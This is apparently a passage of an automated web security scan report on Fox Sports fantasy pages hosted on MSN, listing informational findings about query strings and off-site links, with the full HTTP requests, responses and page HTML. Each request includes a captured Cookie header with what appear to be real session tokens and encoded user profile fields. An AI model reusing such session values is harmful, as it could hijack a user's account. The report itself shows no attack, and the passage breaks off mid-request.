...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportssouthwest.com/01/05/11/Tannehill-hopes-to-continue-winning-ways/landing_big12.html?blockID=385631&amp;feedID=3673' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Keep the change');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Keep the change') });location.href=this.href;">
<div id="blurb_1" align="left" class="blurb">
...[SNIP]...
<li>
           <a href="http://cfn.scout.com/2/1036442.html">CFB: NFL early entries analysis </a>
...[SNIP]...
<li>
           <a href="http://cfn.scout.com/2/1036442.html"> </a>
...[SNIP]...
<div class="fs-tune-in">

   
           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=bee1e6c5-cfbf-47eb-a69f-e90c5ecda39c&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=bee1e6c5-cfbf-47eb-a69f-e90c5ecda39c&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=b22c5085-d0f5-494f-a5a9-b497c96d1232&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b22c5085-d0f5-494f-a5a9-b497c96d1232&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=cc583e25-3e4c-487e-bf25-ff005f8ce822&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=cc583e25-3e4c-487e-bf25-ff005f8ce822&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=0f918bd3-af4d-456e-bf18-4bc5783da5f1&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=0f918bd3-af4d-456e-bf18-4bc5783da5f1&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/college-football?vid=405a265f-6b52-4892-a55e-a4286a55d06b&amp;from=foxsports/college-football/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=405a265f-6b52-4892-a55e-a4286a55d06b&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too">
RB Clay, too
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&amp;feedID=5059" title="RB Clay, too"></a>
...[SNIP]...


   
<a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot">QB Pryor has surgery on foot</a>
...[SNIP]...


   
        <a href="http://www.foxsportsohio.com/01/07/11/Reports-Terrelle-Pryor-to-have-surgery-o/landing.html?blockID=386902&amp;feedID=3724" title="QB Pryor has surgery on foot"></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU">
TCU billboard takes shot at OSU
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportssouthwest.com/01/06/11/TCU-fires-back-at-Buckeyes-with-billboar/landing.html?blockID=386399&amp;feedID=4519" title="TCU billboard takes shot at OSU"></a>
...[SNIP]...
<div class="fs-page-banner-sliver">

   
           <a href="http://www.whatifsports.com/x.asp?r=678106&amp;u=gd "><img src="http://static.foxsports.com/content/fscom/img/2010/11/24/GD_300x90_20101124150713_0_0.JPG" alt=""/>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.9. http://msn.foxsports.com/fantasy/basketball/hotstreak/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/basketball/hotstreak/

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains.

Request

GET /fantasy/basketball/hotstreak/?nicmp=BKHS10&nichn=FSHP&niseg=FEATURES HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 27428
Content-Type: text/html; charset=utf-8
Set-Cookie: pWHATIFSPORTS=syvsD/cwqnOuoLEw9KxHZJfHz0r3youABj/b9tMw3qkfNeDRMaTtoPPQuou6Dl0Xp8REZUnE4gAx5rYUN3YtbLeKqc3QtBseGA/JPupM4DB6VVtkGmxdYQaNKHMv0iLX+G7TN3TujbV9sCJ8Ko6TxzU5tMd3PI63XAShUYYPUM1vImtW6BXC/fdngMs+t99ihGDkXA+hiL55A2nvUGxdgpw3wDrx72S93lL3aCH2D2ZXdoPzE+1e5Nvr55RO6kn8D3oC5fh2x3j8BhFFDJwaqFZJxXYAQWumDj7rhlLeO5ufG4QVtH33g6lctBItAeoqkVEG5sB/pdQmBHyJ3OhZ5YLOuaL7Z5BDAv59nluKscfPwDi4Q23xgrpZENOmOVsE; domain=.foxsports.com; expires=Thu, 07-Jul-2011 00:34:06 GMT; path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Expires: Sat, 08 Jan 2011 01:15:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:15:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!-- Begin 'Like' button-->
<iframe src="http://www.facebook.com/plugins/like.php?href=http://msn.foxsports.com/fantasy/basketball/hotstreak/&amp;layout=standard&amp;show_faces=true&amp;width=300&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl01_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/H4Z9PUoQ9ls/david-stern-talks-lebron-james-contraction-tattoos-with-jason-whitlock-010611" target="_blank">Commish: 'The Decision' right for NBA</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl02_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/PoaOZUw1M4g/nowitzki-unsure-when-he-will-return" target="_blank">Nowitzki unsure when he will return</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl03_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/KfDb-0nCTok/Houston-Rockets-Yao-Ming-scheduled-for-ankle-surgery-010611" target="_blank">Yao undergoes another ankle surgery</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl04_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/C_Ortfu5SCg/Kevin-Durant-powers-Oklahoma-City-Thunder-past-short-handed-Dallas-Mavericks-010611" target="_blank">Durant powers Thunder past Mavericks</a>
...[SNIP]...
<li><a id="ctl00_SecondaryColumn_ctl01_rssFOX_NewsRepeater_ctl05_NewsLink" href="http://feedproxy.google.com/~r/Foxsports/rss/NBA/~3/gWaGK9vLpl4/LeBron-James-Dwyane-Wade-lead-in-NBA-All-Star-Game-voting-010611" target="_blank">LeBron, Wade have edge on KG, Rondo</a>
...[SNIP]...
<h3><a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<h3><a href="http://www.newscorp.com" title="News Corp.">News Corp.</a>
...[SNIP]...
<h3><a href="http://www.fox.com" title="FOX">FOX</a>
...[SNIP]...
<h3><a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<h3><a href="http://www.fxnetworks.com" title="FX">FX</a>
...[SNIP]...
<h3><a href="http://www.speedtv.com" title="Speed TV">Speed TV</a>
...[SNIP]...
<h3><a href="http://www.fuel.tv" title="NCAAFuel TV">Fuel TV</a>
...[SNIP]...
<li><a title="Jobs" href="http://www.foxcareers.com">Jobs</a>
...[SNIP]...
<li><a title="Join Our Opinion Panel" href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1">Join Our Opinion Panel</a>
...[SNIP]...
<li><a title="FOX.com" href="http://www.fox.com">FOX.com</a>
...[SNIP]...
<li><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<li><a title="News Corp" href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<li class="last"><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
               <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js" language="javascript"></script>
...[SNIP]...
<span><img width="0" height="0" alt="" style="display: none;" src="http://b.scorecardresearch.com/b?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=1.3&amp;cj=1"></span>
...[SNIP]...
<li><a title="MSN Privacy" href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a title="Legal" href="http://g.msn.com/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a title="Advertise" href="http://advertising.msn.com/home/home.asp" target="_blank">Advertise</a>
...[SNIP]...
<li><a title="RSS" href="http://rss.msn.com/" target="_blank">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.10. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/bowlpickem/

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains.

Request

GET /fantasy/collegefootball/bowlpickem/?nicmp=BPKM10&nichn=FSHP&niseg=FEATURES HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 33174
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fd156a;path=/
Set-Cookie: NSC_gtg-qjdlfn-qspe-mb1=445336fc156a;path=/
Expires: Sat, 08 Jan 2011 01:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:13:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>


   
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</div>
<a href="http://www.whatifsports.com/x.asp?r=678106&u=decmadness" target="_blank"><img src="/fantasy/collegefootball/bowlpickem/public/fe/img/game-front/December_Madness_300x90.jpg" width="300" height="90" alt="2010 College Football Playoff Simulation by WhatIfSports" title="2010 Co
...[SNIP]...
<br>&#8226;&nbsp;<a blurb="Wisconsin running back John Clay says he will enter the NFL draft." href="http://www.foxsportswisconsin.com/01/07/11/NFL-bound/landing.html?blockID=387085&feedID=5059">RB Clay, too</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                <a title="Jobs" href="http://www.foxcareers.com">Jobs</a>
...[SNIP]...
<li>
                <a title="Join Our Opinion Panel" href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                <a title="FOX.com" href="http://www.fox.com">FOX.com</a>
...[SNIP]...
<li>
                <a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<li>
                <a title="News Corp" href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<li class="last">
                <a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<li><a title="MSN Privacy" href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a title="Legal" href="http://g.msn.com/0TO_/enus" target="_blank">Legal</a>
...[SNIP]...
<li><a title="Advertise" href="http://advertising.msn.com/home/home.asp" target="_blank">Advertise</a>
...[SNIP]...
<li><a title="RSS" href="http://rss.msn.com/" target="_blank">RSS</a></li>
        <li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.11. http://msn.foxsports.com/fantasy/collegefootball/pickem/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy/collegefootball/pickem/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /fantasy/collegefootball/pickem/?nicmp=CFBPM&nichn=FSROS&niseg=FSFEATURESHP HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; 